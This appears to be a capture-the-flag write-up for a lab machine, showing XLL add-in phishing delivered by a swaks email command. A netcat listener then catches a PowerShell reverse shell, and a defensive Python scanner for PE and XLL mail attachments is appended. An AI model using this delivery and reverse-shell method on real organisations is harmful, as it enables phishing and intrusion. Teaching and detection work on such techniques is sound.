XLL


During web enumeration, the About section was found to list an account, accounts@axlle.htb, which can be contacted for invoices or requests in Excel format. It also indicates that macros are disabled in the Excel files provided.

Since the target's SMTP service is up and running on port 25, delivery can be made through it.

It was speculated that code execution could potentially be achieved through the use of an Excel extension, specifically .xll.

The .xll extension refers to Excel Add-in files, which are dynamic link libraries (DLLs) designed to extend Excel’s functionality with additional features and custom functions. These files can include executable code, making them capable of enhancing Excel but also posing potential security risks if used maliciously. Due to their ability to run code, .xll files should be treated with caution, especially when obtained from untrusted sources.

Looking further into the .xll extension, there is a blog article showcasing an exploitation technique that uses an XLL file for code execution.

Exploit


The newly compiled XLL payload has been transferred to Kali.

Exploitation


┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ swaks --to accounts@axlle.htb --from blah@example.com --header "Subject: update" --body "check this out" --attach @HelloWorldXll.xll  --server $IP
=== Trying 10.10.11.21:25...
=== Connected to 10.10.11.21.
<-  220 MAINFRAME ESMTP
 -> EHLO kali
<-  250-MAINFRAME
<-  250-SIZE 20480000
<-  250-AUTH LOGIN
<-  250 HELP
 -> MAIL FROM:<blah@example.com>
<-  250 OK
 -> RCPT TO:<accounts@axlle.htb>
<-  250 OK
 -> DATA
<-  354 OK, send.
 -> Date: Thu, 27 Jun 2024 14:26:00 +0200
 -> To: accounts@axlle.htb
 -> From: blah@example.com
 -> Subject: update
 -> Message-Id: <20240627142600.1176320@kali>
 -> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
 -> MIME-Version: 1.0
 -> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_1176320"
 -> 
 -> ------=_MIME_BOUNDARY_000_1176320
 -> Content-Type: text/plain
 -> 
 -> check this out
 -> ------=_MIME_BOUNDARY_000_1176320
 -> Content-Type: application/octet-stream; name="HelloWorldXll.xll"
 -> Content-Description: HelloWorldXll.xll
 -> Content-Disposition: attachment; filename="HelloWorldXll.xll"
 -> Content-Transfer-Encoding: BASE64
 -> 
 -> 
 -> ------=_MIME_BOUNDARY_000_1176320--
 -> 
 -> 
 -> .
<-  250 Queued (10.375 seconds)
 -> QUIT
<-  221 goodbye
=== Connection closed with remote host.

Using swaks to deliver the XLL payload as an attachment to the contact, accounts@axlle.htb.

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [10.10.14.110] from (UNKNOWN) [10.10.11.21] 61727
 
PS C:\> whoami
axlle\gideon.hamill
PS C:\> hostname
MAINFRAME
PS C:\> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::221
   IPv6 Address. . . . . . . . . . . : dead:beef::ff27:2a17:3cd2:b528
   Link-local IPv6 Address . . . . . : fe80::ff83:e019:f578:fe72%11
   IPv4 Address. . . . . . . . . . . : 10.10.11.21
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1bd3%11
                                       10.10.10.2

Initial foothold established on the target system as the gideon.hamill user via XLL phishing.
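From the defending side, the message in the swaks transcript above is easy to flag at the mail gateway: the attachment is a PE file (an XLL is a DLL) carrying the `xlAutoOpen` export name, which is the function Excel calls when it loads an add-in. The following is an added example, not code from the original write-up; the function names, the `invoice.xlsx` filename and the stub bytes are constructed for illustration, and the check matches on file content so that a renamed attachment is still caught.

```python
import struct
from email import message_from_bytes, policy
from email.message import EmailMessage

# Export name Excel resolves and calls when it loads an add-in.
XLL_EXPORT = b"xlAutoOpen\x00"


def is_pe(data: bytes) -> bool:
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def scan_message(raw: bytes) -> list:
    """Return one finding per MIME part that looks like an Excel add-in."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_filename() or ""
        payload = part.get_payload(decode=True) or b""  # undoes base64/QP
        reasons = []
        if name.lower().endswith(".xll"):
            reasons.append("xll-extension")
        if is_pe(payload):
            # Content check: still fires if the file was renamed.
            reasons.append("pe-content")
            if XLL_EXPORT in payload:
                reasons.append("xlAutoOpen-export-name")
        if reasons:
            findings.append({"filename": name, "reasons": reasons})
    return findings


def constructed_stub() -> bytes:
    """Constructed sample: MZ header, PE signature and the export name string.
    It is not a loadable DLL and contains no code."""
    header = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)
    return header + b"PE\x00\x00" + b"\x00" * 32 + XLL_EXPORT


def build_sample(filename: str, content: bytes) -> bytes:
    """Constructed message with the same shape as the one in the transcript."""
    m = EmailMessage()
    m["From"] = "blah@example.com"
    m["To"] = "accounts@axlle.htb"
    m["Subject"] = "update"
    m.set_content("check this out")
    m.add_attachment(content, maintype="application",
                     subtype="octet-stream", filename=filename)
    return m.as_bytes()


if __name__ == "__main__":
    for name in ("HelloWorldXll.xll", "invoice.xlsx"):
        print(name, scan_message(build_sample(name, constructed_stub())))
```

A gateway that quarantines on `pe-content` alone already blocks this delivery path; the export-name match is what distinguishes an Excel add-in from other DLLs.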